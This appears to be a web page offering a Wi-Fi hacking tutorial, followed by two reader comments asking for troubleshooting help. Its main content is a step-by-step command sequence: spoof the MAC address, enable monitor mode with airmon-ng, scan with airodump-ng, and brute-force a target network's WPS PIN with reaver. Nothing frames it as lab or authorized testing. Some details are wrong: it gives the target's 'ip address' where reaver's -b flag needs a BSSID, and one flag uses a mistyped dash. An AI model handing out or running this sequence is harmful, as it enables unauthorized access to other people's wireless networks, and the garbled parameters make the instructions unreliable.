Hacking Wi-Fi with ANY version of Linux!! (Ubuntu, Mint, Debian, Kali, Backtrack, etc.)

Video is ready, Click Here to View ×

Terminal commands:
sudo passwd
(software install for Linux versions other than Kali or Backtrack)
apt-get install macchanger
apt-get install aircrack-ng
apt-get install reaver

ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
airmon-ng start wlan0
(dont kill anything unless it doesnt work first attempt)
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
airodump-ng mon0
reaver -i mon0 -b (ip address of target) -vv –dh-small

if you get an…


  1. i am getting this error
    [+] Waiting for beacon from E0:3F:49:EE:F8:DB
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: (null))

    ofcourse I type in the BSSID in the place of the X's
    can somebody help me pls?

  2. yo when i go to install the programs needed, macchanger, aircrack, etc., i enter
    apt-get install [blank] or
    apt install [blank]

    and after identifying it, it says E: Unable to locate package [blank]
    Why isn't it working?

Leave a Reply

Your email address will not be published.